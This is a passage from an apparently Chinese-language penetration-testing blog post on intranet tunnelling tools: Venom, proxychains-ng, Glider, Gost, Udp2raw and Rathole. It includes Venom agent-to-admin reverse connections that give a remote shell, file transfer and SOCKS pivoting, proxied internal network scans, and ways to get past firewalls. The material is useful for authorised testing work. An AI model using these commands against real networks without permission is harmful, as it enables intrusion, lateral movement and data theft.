<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"><span class="title class_">Options</span>:</span><br><span class="line">  -lport port   监听一个本地端口</span><br><span class="line">  -passwd password  加密通信中使用的密码</span><br><span class="line">  -rhost ip  远程连接端 ip 地址</span><br><span class="line">  -rport port 远程连接端端口号</span><br></pre></td></tr></table></figure>

<ul>
<li>agent</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"><span class="title class_">Options</span>:</span><br><span class="line">  -lhost ip 本地ip地址</span><br><span class="line">  -lport port 监听本地端口</span><br><span class="line">  -passwd password 加密通信中使用的密码</span><br><span class="line">  -reuse-port port 端口复用指定的端口号</span><br><span class="line">  -rhost ip 远程连接端的ip地址</span><br><span class="line">  -rport port  远程连接端的端口号</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<blockquote>
<p>使用流程</p>
</blockquote>
<ul>
<li>sudo .&#x2F;admin_linux_x64 -lport 12131 -passwd passwdkey  管理端监听</li>
<li>sudo venom-agent -rhost “admin ip”  -rport 12131 -passwd passwdkey 客户端连接</li>
</ul>
<blockquote>
<p>admin help 参数</p>
</blockquote>
<ul>
<li>help                                           显示帮助信息</li>
<li>exit                                            退出</li>
<li>show                                         显示网络拓扑</li>
<li>getdes                                       查看目标节点描述.</li>
<li>setdes     [info]                          向目标节点添加说明.</li>
<li>goto       [id]                              通过 id 选择节点</li>
<li>listen     [lport]                           监听目标节点上的端口.</li>
<li>connect    [rhost] [rport]               通过目标节点连接到新节点.</li>
<li>sshconnect [user@ip:port] [dport]        通过ssh 隧道连接到新节点</li>
<li>shell                                                      在目标节点上启动shell.</li>
<li>upload     [local_file]  [remote_file]       上传文件.</li>
<li>download   [remote_file]  [local_file]     下载文件.</li>
<li>socks      [lport]                                     启动一个socks5隧道.</li>
<li>lforward   [lhost] [sport] [dport]        将本地端口转发到远程端口.</li>
<li>rforward   [rhost] [sport] [dport]       远程端口转发到本地端口.</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"></span><br><span class="line">show 显示节点信息</span><br><span class="line">随后 goto <span class="number">1</span> 选择<span class="number">1</span>节点</span><br><span class="line">listen <span class="number">12133</span> 在节点<span class="number">1</span>监听<span class="number">12133</span>端口</span><br><span class="line">随后 goto <span class="number">2</span> 选择<span class="number">2</span>节点</span><br><span class="line">connect <span class="number">192.168</span><span class="number">.228</span><span class="number">.10</span> <span class="number">12133</span>  随后节点<span class="number">2</span>连接到节点<span class="number">1</span>,节点<span class="number">1</span>成为子节点，或者 agent_linux_x64 -rhost <span class="number">192.168</span><span class="number">.204</span><span class="number">.139</span> -rport 进行连接</span><br><span class="line">sshconnect root@<span class="number">192.168</span><span class="number">.0</span><span class="number">.104</span>:<span class="number">22</span> <span class="number">9999</span>  监听端口后通过ssh隧道连接</span><br><span class="line">goto <span class="number">1</span> 节点后执行 shell 打开一个shell</span><br><span class="line">upload /tmp/test.<span class="property">pdf</span> /tmp/test2.<span class="property">pdf</span> 上传文件</span><br><span class="line">download /tmp/test2.<span class="property">pdf</span> /tmp/test3.<span class="property">pdf</span> 下载文件</span><br><span class="line">socks <span class="number">8090</span> 开启socks5隧道，admin端配置后可通过隧道访问内网agent</span><br><span class="line"></span><br><span class="line">lforward将admin节点本地的<span class="number">8888</span>端口转发到node1的<span class="number">8888</span>端口</span><br><span class="line">lforward <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8888</span> <span class="number">8888</span></span><br><span class="line"></span><br><span class="line">rforward 将node1网段的<span class="number">192.168</span><span class="number">.204</span><span class="number">.103</span>端口<span class="number">8889</span>转发到admin节点本地的<span class="number">8889</span>端口</span><br><span class="line">rforward <span class="number">192.168</span><span class="number">.204</span><span class="number">.103</span> <span class="number">8889</span> <span class="number">8889</span></span><br></pre></td></tr></table></figure>

<hr>
<h2 id="proxychains-ng"><a href="#proxychains-ng" class="headerlink" title="proxychains-ng"></a>proxychains-ng</h2><aside>
💩 通过此工具可以实现指定命令通过隧道连接访问网络

<p>ProxyChains 是一个 UNIX 程序，在动态链接程序中并通过 SOCKS4a&#x2F;5 或 HTTP 代理重定向连接。它仅支持 TCP（不支持 UDP&#x2F;ICMP 等）。</p>
</aside>

<blockquote>
<p><strong>使用场景</strong></p>
</blockquote>
<ul>
<li>命令行命令通过代理隧道转发流量，例如<code>proxychains curl [target.com](http://target.com)</code> <code>curl</code> 命令通过<code>proxychains</code> 配置的隧道进行连接。</li>
<li>内网渗透进行内网穿透后连接内网隧道进行测试。例如通过隧道扫描内网。</li>
</ul>
<blockquote>
<p><strong>安装</strong></p>
</blockquote>
<ul>
<li><a href="https://github.com/rofl0r/proxychains-ng/releases">https://github.com/rofl0r/proxychains-ng/releases</a></li>
<li>几乎所有的发行版仓库都存在这个包，直接使用包管理器进行安装即可</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">例如：</span><br><span class="line">apt install proxychains-ng</span><br><span class="line">pacman -S proxychains-ng</span><br></pre></td></tr></table></figure>

<blockquote>
<p><strong>配置文件</strong></p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">配置文件位置 /etc/proxychains.<span class="property">conf</span></span><br><span class="line"></span><br><span class="line">#dynamic_chain 动态链配置，根据列表中配置的服务器进行逐个连接，自动跳过失效的服务器，其中一个成功不再继续下一个。</span><br><span class="line">#strict_chain  静态链配置，根据列表中配置的服务器进行逐个连接，所有配置的服务器连接形成代理链，所有服务器都必须在线。</span><br><span class="line">#round_robin_chain 同strict_chain,但是会跳过失败服务器。</span><br><span class="line">#random_chain   随机选择服务器完成连接</span><br><span class="line">#chain_len = <span class="number">2</span>  选择连接几个服务器，只有当使用random_chain或round_robin_chain时才有意义</span><br><span class="line">#quiet_mode  安静模式，不显示库输出信息，推荐开启</span><br><span class="line"># proxy_dns 代理dns请求，proxychains官方模式，简单速度快，可能不兼容浏览器</span><br><span class="line"># proxy_dns_old 代理dns请求，模式二，速度慢，不支持，o nio n url，兼容性更好</span><br><span class="line">#proxy_dns_daemon <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">1053</span>  代理dns请求，模式三，兼容性最好，类似模式一，需要首先通过 proxychains4-daemon 指定本地服务运行</span><br><span class="line"></span><br><span class="line">服务器配置格式</span><br><span class="line"></span><br><span class="line">#            	socks5	<span class="number">192.168</span><span class="number">.67</span><span class="number">.78</span>	<span class="number">1080</span>	lamer	secret</span><br><span class="line">#		          http	<span class="number">192.168</span><span class="number">.89</span><span class="number">.3</span>	<span class="number">8080</span>	justu	hidden</span><br><span class="line">#	 	          socks4	<span class="number">192.168</span><span class="number">.1</span><span class="number">.49</span>	<span class="number">1080</span></span><br><span class="line">#	            http	<span class="number">192.168</span><span class="number">.39</span><span class="number">.93</span>	<span class="number">8080</span>	</span><br><span class="line"></span><br><span class="line">[<span class="title class_">ProxyList</span>]  配置服务器</span><br><span class="line">socks5 <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span> </span><br><span class="line">socks5 <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span> user pass</span><br><span class="line">http <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span> <span class="number">8090</span>  user pass</span><br></pre></td></tr></table></figure>

<blockquote>
<p>使用</p>
</blockquote>
<ul>
<li>proxychains curl <a href="http://target.com/">target.com</a>   通过服务器转发 curl 的请求流量。</li>
<li>proxychains nmap 192.168.0.1&#x2F;24  通过配置的内网穿透隧道进行内网渗透扫描信息搜集</li>
<li>。。。</li>
</ul>
<hr>
<h2 id="Glider"><a href="#Glider" class="headerlink" title="Glider"></a>Glider</h2><aside>
📌 Glider是一个支持多种协议的转发代理，也是一个具有IPset管理功能（如DNSMASQ）的DNS/DHCP服务器。 
项目地址：https://github.com/nadoo/glider

</aside>

<blockquote>
<p>功能</p>
</blockquote>
<ul>
<li>快速隧道建立</li>
<li>快速代理链配置</li>
<li>同时支持多种协议代理链互联</li>
<li>DNS 代理</li>
<li>在同一端口上提供http和socks 5</li>
<li>支持广泛协议（几乎所有）</li>
</ul>
<blockquote>
<p>安装</p>
</blockquote>
<ul>
<li>Binary: <a href="https://github.com/nadoo/glider/releases">https://github.com/nadoo/glider/releases</a></li>
<li>Docker: <code>docker pull nadoo/glider</code></li>
<li>Manjaro: <code>pamac install glider</code></li>
<li>ArchLinux: <code>sudo pacman -S glider</code></li>
<li>Homebrew: <code>brew install glider</code></li>
<li>MacPorts: <code>sudo port install glider</code></li>
<li>Source: <code>go install github.com/nadoo/glider@latest</code></li>
</ul>
<blockquote>
<p>使用</p>
</blockquote>
<ul>
<li><code>glider -verbose -listen :8443</code>  监听http 与 socks5 隧道到0.0.0.0:8443 端口</li>
<li><code>glider -listen socks5://:1080 -listen http://:8080 -verbose</code> 监听http隧道和socks5隧道</li>
<li><code>glider -listen :8443 -forward direct://#interface=eth0 -forward direct://#interface=eth1</code> 多个转发器：侦听8443，并在循环模式下通过接口eth0和eth1转发请求。</li>
<li><code>glider -listen http://:8080 -forward socks5://serverA:1080,socks5://serverB:1080</code>  监听8080端口，建立http隧道，通过forward设置的隧道链进行链接</li>
<li><code>glider -listen :8443 -forward socks5://serverA:1080 -forward socks5://serverB:1080#priority=10 -forward socks5://serverC:1080#priority=10</code>  设置转发器优先级，转发器优先级：只有当服务器B和服务器C不可用时，才会使用服务器A。</li>
<li><code>glider -verbose -listen :8443 -forward direct://#interface=eth0 -forward direct://#interface=eth1 -strategy rr</code> 对多个转发接口进行负载均衡</li>
<li><code>glider -verbose -listen :8443 -forward direct://#interface=eth0&amp;priority=100 -forward direct://#interface=eth1&amp;priority=200 -strategy ha</code>  或者高可用模式</li>
</ul>
<hr>
<h2 id="Gost-v3"><a href="#Gost-v3" class="headerlink" title="Gost v3"></a>Gost v3</h2><aside>
📖 用golang编写的简单隧道 ，GOST可以通过命令行参数直接开启一个或多个服务，无需额外的配置文件。
项目地址：https://github.com/go-gost/gost

</aside>

<blockquote>
<p>功能</p>
</blockquote>
<ul>
<li>端口转发</li>
<li>代理隧道</li>
<li>透明代理</li>
<li>DNS代理</li>
<li>ICMP隧道</li>
<li>内网穿透</li>
<li>TUN &#x2F; TAP</li>
</ul>
<blockquote>
<p>文档地址：<a href="https://latest.gost.run/">https://latest.gost.run</a></p>
</blockquote>
<blockquote>
<p>常用功能</p>
</blockquote>
<ul>
<li>iCMP 隧道</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">服务端</span><br><span class="line"></span><br><span class="line">gost -L relay+<span class="attr">icmp</span>:<span class="comment">//:0</span></span><br><span class="line"></span><br><span class="line">客户端</span><br><span class="line"></span><br><span class="line">gost -L :<span class="number">8080</span> -F <span class="string">&quot;relay+icmp://server_ip:12345?keepalive=true&amp;ttl=10s&quot;</span></span><br><span class="line"></span><br><span class="line">客户端标识</span><br><span class="line"></span><br><span class="line"><span class="variable constant_">ICMP</span>与通常的传输层协议，例如<span class="variable constant_">TCP</span>，<span class="variable constant_">UDP</span>不同，没有端口的概念，但为了区分不同的客户端，需要对客户端进行标识。<span class="variable constant_">GOST</span>中采用<span class="variable constant_">IP</span>+<span class="variable constant_">ID</span>的方式来标识一个客户端，<span class="variable constant_">IP</span>即客户端<span class="variable constant_">IP</span>地址，<span class="variable constant_">ID</span>是<span class="variable constant_">ICMP</span> <span class="title class_">Echo</span>报文中的<span class="title class_">Identifier</span>字段值。</span><br><span class="line"></span><br><span class="line">在客户端可以通过类似于指定端口的方式来指定<span class="variable constant_">ID</span>，例如上面例子中的<span class="number">12345</span>。也可以设置为<span class="number">0</span>，<span class="variable constant_">GOST</span>会自动生成一个随机<span class="variable constant_">ID</span>。对于服务端这个值无效。</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Udp2raw"><a href="#Udp2raw" class="headerlink" title="Udp2raw"></a>Udp2raw</h2><aside>
📖 通过使用原始套接字将UDP流量转换为加密UDP/FakeTCP/ICMP流量的隧道，帮助您绕过UDP防火墙（或不稳定的UDP环境）

</aside>

<blockquote>
<p>安装</p>
</blockquote>
<ul>
<li><a href="https://github.com/wangyu-/udp2raw-tunnel/releases">https://github.com/wangyu-/udp2raw-tunnel/releases</a></li>
</ul>
<blockquote>
<p>使用</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">假设你有一个server，ip为<span class="number">44.55</span><span class="number">.66</span><span class="number">.77</span>，有一个服务监听在udp <span class="number">7777</span>端口。 假设你本地的主机到<span class="number">44.55</span><span class="number">.66</span><span class="number">.77</span>的<span class="variable constant_">UDP</span>流量被屏蔽了，或者被qos了</span><br><span class="line"></span><br><span class="line">在server端运行:</span><br><span class="line">./udp2raw_amd64 -s -l0<span class="number">.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">4096</span>  -r127<span class="number">.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">7777</span>   -k <span class="string">&quot;passwd&quot;</span> --raw-mode faketcp   --cipher-mode xor  -a</span><br><span class="line"></span><br><span class="line">在client端运行:</span><br><span class="line">./udp2raw_amd64 -c -l0<span class="number">.0</span><span class="number">.0</span><span class="number">.0</span>:<span class="number">3333</span>  -r44<span class="number">.55</span><span class="number">.66</span><span class="number">.77</span>:<span class="number">4096</span> -k <span class="string">&quot;passwd&quot;</span> --raw-mode faketcp   --cipher-mode xor  -a</span><br><span class="line"></span><br><span class="line">现在client和server之间建立起了，tunnel。想要在本地连接<span class="number">44.55</span><span class="number">.66</span><span class="number">.77</span>:<span class="number">7777</span>，只需要连接 <span class="number">127.0</span><span class="number">.0</span><span class="number">.1</span>:<span class="number">3333</span>。来回的所有的udp流量会被经过tunneling发送。在外界看起来是tcp流量，不会有udp流量暴露到公网。</span><br><span class="line">--raw-mode 参数可选，<span class="title function_">faketcp</span>(默认)、udp、icmp，根据当前网络情况选择。</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Rathole"><a href="#Rathole" class="headerlink" title="Rathole"></a>Rathole</h2><aside>
📖 安全、稳定、高性能的内网穿透工具，用 Rust 语言编写，类似与frp，ngrok。

</aside>

<blockquote>
<p>特点</p>
</blockquote>
<ul>
<li><strong>高性能</strong> 具有更高的吞吐量，高并发下更稳定。见<a href="https://github.com/rapiz1/rathole/blob/main/README-zh.md#benchmark">Benchmark</a></li>
<li><strong>低资源消耗</strong> 内存占用远低于同类工具。见<a href="https://github.com/rapiz1/rathole/blob/main/README-zh.md#benchmark">Benchmark</a>。<a href="https://github.com/rapiz1/rathole/blob/main/docs/build-guide.md">二进制文件最小</a>可以到 <strong>~500KiB</strong>，可以部署在嵌入式设备如路由器上。</li>
<li><strong>安全性</strong> 每个服务单独强制鉴权。Server 和 Client 负责各自的配置。使用 Noise Protocol 可以简单地配置传输加密，而不需要自签证书。同时也支持 TLS。</li>
<li><strong>热重载</strong> 支持配置文件热重载，动态修改端口转发服务。</li>
</ul>
<blockquote>
<p>功能</p>
</blockquote>
<ul>
<li>内网穿透</li>
<li>端口转发</li>
<li>内网穿透代理隧道，http，socks5</li>
</ul>
<blockquote>
<p>安装</p>
</blockquote>
<ul>
<li><a href="https://github.com/rapiz1/rathole/releases">https://github.com/rapiz1/rathole/releases</a>  选择对应系统架构下载</li>
<li>或者使用包管理器，apt，pacman，brew等等。</li>
</ul>
<blockquote>
<p>配置文件</p>
</blockquote>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">**客户端配置文件**</span><br><span class="line">[client]</span><br><span class="line">remote_addr = <span class="string">&quot;example.com:2333&quot;</span> # 必要。服务器的地址</span><br><span class="line"></span><br><span class="line">default_token = <span class="string">&quot;default_token_if_not_specify&quot;</span> # 可选参数。服务的默认令牌，定义密码(如果它们没有定义自己的令牌)</span><br><span class="line"></span><br><span class="line">heartbeat_timeout = <span class="number">40</span> 设置为<span class="number">0</span>表示关闭应用层心跳测试。必须大于“server.<span class="property">heartbeat_interval</span>”。默认值:<span class="number">40</span>秒，可选</span><br><span class="line"></span><br><span class="line">retry_interval = <span class="number">1</span> # 可选。重试连接到服务器的时间间隔。默认值:<span class="number">1</span>秒</span><br><span class="line"></span><br><span class="line">[client.<span class="property">transport</span>] # 可选，指定传输协议 [<span class="string">&quot;tcp&quot;</span>, <span class="string">&quot;tls&quot;</span>, <span class="string">&quot;noise&quot;</span>]. <span class="title class_">Default</span>: <span class="string">&quot;tcp&quot;</span></span><br><span class="line">[client.<span class="property">transport</span>.<span class="property">tcp</span>] # <span class="title class_">Optional</span>. <span class="title class_">Also</span> affects <span class="string">`noise`</span> and <span class="string">`tls`</span></span><br><span class="line"></span><br><span class="line">proxy = <span class="string">&quot;socks5://user:passwd@127.0.0.1:1080&quot;</span> # 可选，设置代理连接服务器</span><br><span class="line"></span><br><span class="line">nodelay = <span class="literal">true</span> # 可选 <span class="string">`client.transport.nodelay`</span> 覆盖服务</span><br><span class="line"></span><br><span class="line">keepalive_secs = <span class="number">20</span> # 可选的。如果适用，请在<span class="title function_">tcp</span>(<span class="number">7</span>)中指定tcp_keepalive_time。默认值:<span class="number">20</span>秒</span><br><span class="line"></span><br><span class="line">keepalive_interval = <span class="number">8</span> #可选的。如果适用，请在<span class="title function_">tcp</span>(<span class="number">7</span>)中指定tcp_keepalive_intvl。默认值:<span class="number">8</span>秒</span><br><span class="line"></span><br><span class="line">[client.<span class="property">transport</span>.<span class="property">tls</span>] # <span class="title class_">Necessary</span> <span class="keyword">if</span> <span class="string">`type`</span> is <span class="string">&quot;tls&quot;</span></span><br><span class="line"></span><br><span class="line">trusted_root = <span class="string">&quot;ca.pem&quot;</span> # ca根证书</span><br><span class="line"></span><br><span class="line">hostname = <span class="string">&quot;example.com&quot;</span> # 可选的。客户端用来验证证书的主机名。如果没有设置，回退到“client.<span class="property">remote_addr</span>”</span><br><span class="line"></span><br><span class="line">[client.<span class="property">transport</span>.<span class="property">noise</span>] # <span class="title class_">Noise</span> protocol. <span class="title class_">See</span> <span class="string">`docs/transport.md`</span> <span class="keyword">for</span> further explanation</span><br><span class="line"></span><br><span class="line">pattern = <span class="string">&quot;Noise_NK_25519_ChaChaPoly_BLAKE2s&quot;</span> # <span class="title class_">Optional</span>. <span class="title class_">Default</span> value <span class="keyword">as</span> shown</span><br><span class="line"></span><br><span class="line">local_private_key = <span class="string">&quot;key_encoded_in_base64&quot;</span> # <span class="title class_">Optional</span></span><br><span class="line"></span><br><span class="line">remote_public_key = <span class="string">&quot;key_encoded_in_base64&quot;</span> # <span class="title class_">Optional</span></span><br><span class="line"></span><br><span class="line">[client.<span class="property">transport</span>.<span class="property">websocket</span>] # <span class="title class_">Necessary</span> <span class="keyword">if</span> <span class="string">`type`</span> is <span class="string">&quot;websocket&quot;</span></span><br><span class="line">tls = <span class="literal">true</span> # 如果为<span class="literal">true</span>,使用 <span class="string">`client.transport.tls`</span></span><br><span class="line"></span><br><span class="line">[client.<span class="property">services</span>.<span class="property">service1</span>] # 需要转发的业务。名称<span class="string">&#x27; service1 &#x27;</span>可以任意更改，只要与服务器配置中的名称相同即可</span><br><span class="line"></span><br><span class="line">type = <span class="string">&quot;tcp&quot;</span> # 可选的。需要转发的协议。可能的值: [<span class="string">&quot;tcp&quot;</span>, <span class="string">&quot;udp&quot;</span>]. <span class="title class_">Default</span>: <span class="string">&quot;tcp&quot;</span></span><br><span class="line"></span><br><span class="line">token = <span class="string">&quot;whatever&quot;</span> #  <span class="keyword">if</span> <span class="string">`client.default_token`</span> 没有设置，就必须使用</span><br><span class="line"></span><br><span class="line">local_addr = <span class="string">&quot;127.0.0.1:1081&quot;</span> # 必要的。需要转发的服务的本地ip地址端口</span><br><span class="line"></span><br><span class="line">nodelay = <span class="literal">true</span> # 可选的。确定是否启用<span class="variable constant_">TCP_NODELAY</span>进行数据传输，如果适用，以提高延迟，但减少带宽。默认值:<span class="literal">true</span></span><br><span class="line"></span><br><span class="line">retry_interval = <span class="number">1</span> # 可选的。重试连接到服务器的时间间隔。默认值:继承全局配置</span><br><span class="line"></span><br><span class="line">[client.<span class="property">services</span>.<span class="property">service2</span>] # 可以定义多个服务</span><br><span class="line">local_addr = <span class="string">&quot;127.0.0.1:1082&quot;</span></span><br><span class="line"></span><br><span class="line">**服务端配置文件**</span><br><span class="line">[server]</span><br><span class="line">bind_addr = <span class="string">&quot;0.0.0.0:2333&quot;</span> # 必要的。服务器监听客户端的地址。一般只需要更改端口。</span><br><span class="line"></span><br><span class="line">default_token = <span class="string">&quot;default_token_if_not_specify&quot;</span> # 可选</span><br><span class="line"></span><br><span class="line">heartbeat_interval = <span class="number">30</span> # 可选的。两个应用层心跳的间隔。设置为<span class="number">0</span>表示不发送心跳。默认值:<span class="number">30</span>秒</span><br><span class="line"></span><br><span class="line">[server.<span class="property">transport</span>] # 参考 <span class="string">`[client.transport]`</span></span><br><span class="line">type = <span class="string">&quot;tcp&quot;</span></span><br><span class="line"></span><br><span class="line">[server.<span class="property">transport</span>.<span class="property">tcp</span>] # <span class="title class_">Same</span> <span class="keyword">as</span> the client</span><br><span class="line">nodelay = <span class="literal">true</span></span><br><span class="line">keepalive_secs = <span class="number">20</span></span><br><span class="line">keepalive_interval = <span class="number">8</span></span><br><span class="line"></span><br><span class="line">[server.<span class="property">transport</span>.<span class="property">tls</span>] # 如果<span class="string">&#x27; type &#x27;</span>是<span class="string">&quot;tls&quot;</span>则必需</span><br><span class="line"></span><br><span class="line">pkcs12 = <span class="string">&quot;identify.pfx&quot;</span> # 必要的。服务器证书和私钥的<span class="title class_">Pkcs12</span>文件</span><br><span class="line"></span><br><span class="line">pkcs12_password = <span class="string">&quot;password&quot;</span> # 必要的。pkcs12文件的密码</span><br><span class="line"></span><br><span class="line">[server.<span class="property">transport</span>.<span class="property">noise</span>] # <span class="title class_">Same</span> <span class="keyword">as</span> <span class="string">`[client.transport.noise]`</span></span><br><span class="line"></span><br><span class="line">pattern = <span class="string">&quot;Noise_NK_25519_ChaChaPoly_BLAKE2s&quot;</span></span><br><span class="line"></span><br><span class="line">local_private_key = <span class="string">&quot;key_encoded_in_base64&quot;</span></span><br><span class="line"></span><br><span class="line">remote_public_key = <span class="string">&quot;key_encoded_in_base64&quot;</span></span><br><span class="line"></span><br><span class="line">[server.<span class="property">transport</span>.<span class="property">websocket</span>] # 如果<span class="string">&#x27; type &#x27;</span>是<span class="string">&quot;websocket&quot;</span>则必需</span><br><span class="line">tls = <span class="literal">true</span> # 如果<span class="string">&#x27; true &#x27;</span>，那么它将使用<span class="string">&#x27; server.transport.tls &#x27;</span>中的设置。</span><br><span class="line"></span><br><span class="line">[server.<span class="property">services</span>.<span class="property">service1</span>] # 服务名称必须与客户端相同</span><br><span class="line"></span><br><span class="line">type = <span class="string">&quot;tcp&quot;</span> # <span class="title class_">Optional</span>. <span class="title class_">Same</span> <span class="keyword">as</span> the client <span class="string">`[client.services.X.type]</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">token = &quot;whatever&quot; # 如果&#x27; server.default_token &#x27;未设置则必需</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">bind_addr = &quot;0.0.0.0:8081&quot; # 必要的。服务的地址公开在。一般只需要更改端口。</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">nodelay = true # 可选的。和客户端一样</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">[server.services.service2]</span></span><br><span class="line"><span class="string">bind_addr = &quot;0.0.0.1:8082&quot;</span></span><br></pre></td></tr></table></figure>

<ul>
<li>内网穿透，端口转发，将本地ssh服务转发的远程服务器上</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"># server.<span class="property">toml</span></span><br><span class="line">[server]</span><br><span class="line">bind_addr = <span class="string">&quot;0.0.0.0:2333&quot;</span> # <span class="string">`2333`</span> 配置了服务端监听客户端连接的端口</span><br><span class="line"></span><br><span class="line">[server.<span class="property">services</span>.<span class="property">my_nas_ssh</span>]</span><br><span class="line">token = <span class="string">&quot;use_a_secret_that_only_you_know&quot;</span> # 用于验证的 token</span><br><span class="line">bind_addr = <span class="string">&quot;0.0.0.0:5202&quot;</span> # <span class="string">`5202`</span> 配置了将 <span class="string">`my_nas_ssh`</span> 暴露给互联网的端口</span><br><span class="line"></span><br><span class="line"># client.<span class="property">toml</span></span><br><span class="line">[client]</span><br><span class="line">remote_addr = <span class="string">&quot;myserver.com:2333&quot;</span> # 服务器的地址。端口必须与 <span class="string">`server.bind_addr`</span> 中的端口相同。</span><br><span class="line">[client.<span class="property">services</span>.<span class="property">my_nas_ssh</span>]</span><br><span class="line">token = <span class="string">&quot;use_a_secret_that_only_you_know&quot;</span> # 必须与服务器相同以通过验证</span><br><span class="line">local_addr = <span class="string">&quot;127.0.0.1:22&quot;</span> # 需要被转发的服务的地址</span><br></pre></td></tr></table></figure>

<ul>
<li>配合其他程序建立隧道进行端口转发，通过隧道访问内网</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line"># server.<span class="property">toml</span></span><br><span class="line">[server]</span><br><span class="line">bind_addr = <span class="string">&quot;0.0.0.0:2333&quot;</span> # <span class="string">`2333`</span> 配置了服务端监听客户端连接的端口</span><br><span class="line"></span><br><span class="line">[server.<span class="property">services</span>.<span class="property">tunnel</span>]</span><br><span class="line">token = <span class="string">&quot;use_a_secret_that_only_you_know&quot;</span> # 用于验证的 token</span><br><span class="line">bind_addr = <span class="string">&quot;0.0.0.0:5202&quot;</span> # <span class="string">`5202`</span> 配置了将 <span class="string">`tunnel`</span> 暴露给互联网的端口</span><br><span class="line"></span><br><span class="line"># client.<span class="property">toml</span></span><br><span class="line">[client]</span><br><span class="line">remote_addr = <span class="string">&quot;myserver.com:2333&quot;</span> # 服务器的地址。端口必须与 <span class="string">`server.bind_addr`</span> 中的端口相同。</span><br><span class="line">[client.<span class="property">services</span>.<span class="property">my_nas_tunnel</span>]</span><br><span class="line">token = <span class="string">&quot;use_a_secret_that_only_you_know&quot;</span> # 必须与服务器相同以通过验证</span><br><span class="line">local_addr = <span class="string">&quot;127.0.0.1:8090&quot;</span> # 需要被转发的服务的地址</span><br><span class="line"></span><br><span class="line">使用文章中提到glider工具在本地主机上建立socks隧道</span><br><span class="line">glider -listen :<span class="number">8090</span> -verbose</span><br><span class="line">服务端使用上诉配置文件  rathole s.<span class="property">toml</span></span><br><span class="line">客户端使用上诉配置文件进行连接 rathole c.<span class="property">toml</span></span><br><span class="line">连接成功后客户端监听的<span class="number">8090</span>端口的socks 服务器会被转发到服务器端的<span class="number">5202</span>端口。服务器端连接<span class="number">5202</span>端口可以使用客户端上的隧道进行内网访问。如proxychains 中设置socks代理，进行内网穿透隧道访问内网。</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<ul>
<li>默认情况下， <code>rathole</code>按原样转发流量。  可以启用不同的选项来保护流量。将传输进行加密，使用 noise 进行加密传输</li>
</ul>
<figure class="highlight jsx"><table><tr><td class="code"><pre><span class="line">**运行命令，生成密钥，密钥模式**</span><br><span class="line">❯ rathole --genkey</span><br><span class="line"><span class="title class_">Private</span> <span class="title class_">Key</span>:</span><br><span class="line">nfVDW5u1GGzPOCyMNp9P/S9Ytn6JE11lNnEgcx+<span class="title class_">YBsk</span>=</span><br><span class="line"></span><br><span class="line"><span class="title class_">Public</span> <span class="title class_">Key</span>:</span><br><span class="line"><span class="title class_">TyTLNaqaY7</span>lQU418EPpNJpF1nJG46MJPzu3JR+7AekM=</span><br><span class="line"></span><br><span class="line">随后在配置文件中配置以下信息</span><br><span class="line"># <span class="title class_">Client</span> <span class="title class_">Side</span> <span class="title class_">Configuration</span></span><br><span class="line">[client.<span class="property">transport</span>]</span><br><span class="line">type = <span class="string">&quot;noise&quot;</span></span><br><span class="line">[client.<span class="property">transport</span>.<span class="property">noise</span>]</span><br><span class="line">remote_public_key = <span class="string">&quot;GQYTKSbWLBUSZiGfdWPSgek9yoOuaiwGD/GIX8Z1kkE=&quot;</span></span><br><span class="line"></span><br><span class="line"># <span class="title class_">Server</span> <span class="title class_">Side</span> <span class="title class_">Configuration</span></span><br><span class="line">[server.<span class="property">transport</span>]</span><br><span class="line">type = <span class="string">&quot;noise&quot;</span></span><br><span class="line">[server.<span class="property">transport</span>.<span class="property">noise</span>]</span><br><span class="line">local_private_key = <span class="string">&quot;cQ/vwIqNPJZmuM/OikglzBo/+jlYGrOt9i0k5h5vn1Q=&quot;</span></span><br><span class="line"></span><br><span class="line">**无需密钥验证模式</span><br><span class="line">此配置提供流量加密，但不提供身份验证，这意味着它容易受到 <span class="variable constant_">MITM</span> 攻击，但可以抵抗嗅探和重放攻击。 如果 <span class="variable constant_">MITM</span> 攻击不是问题之一，那么使用起来更方便。**</span><br><span class="line"></span><br><span class="line"># <span class="title class_">Server</span> <span class="title class_">Side</span> <span class="title class_">Configuration</span></span><br><span class="line">[server.<span class="property">transport</span>]</span><br><span class="line">type = <span class="string">&quot;noise&quot;</span></span><br><span class="line">[server.<span class="property">transport</span>.<span class="property">noise</span>]</span><br><span class="line">pattern = <span class="string">&quot;Noise_XX_25519_ChaChaPoly_BLAKE2s&quot;</span></span><br><span class="line"></span><br><span class="line"># <span class="title class_">Client</span> <span class="title class_">Side</span> <span class="title class_">Configuration</span></span><br><span class="line">[client.<span class="property">transport</span>]</span><br><span class="line">type = <span class="string">&quot;noise&quot;</span></span><br><span class="line">[client.<span class="property">transport</span>.<span class="property">noise</span>]</span><br><span class="line">pattern = <span class="string">&quot;Noise_XX_25519_ChaChaPoly_BLAKE2s&quot;</span></span><br><span class="line"></span><br><span class="line">**双向认证**</span><br><span class="line"># <span class="title class_">Server</span> <span class="title class_">Side</span> <span class="title class_">Configuration</span></span><br><span class="line">[server.<span 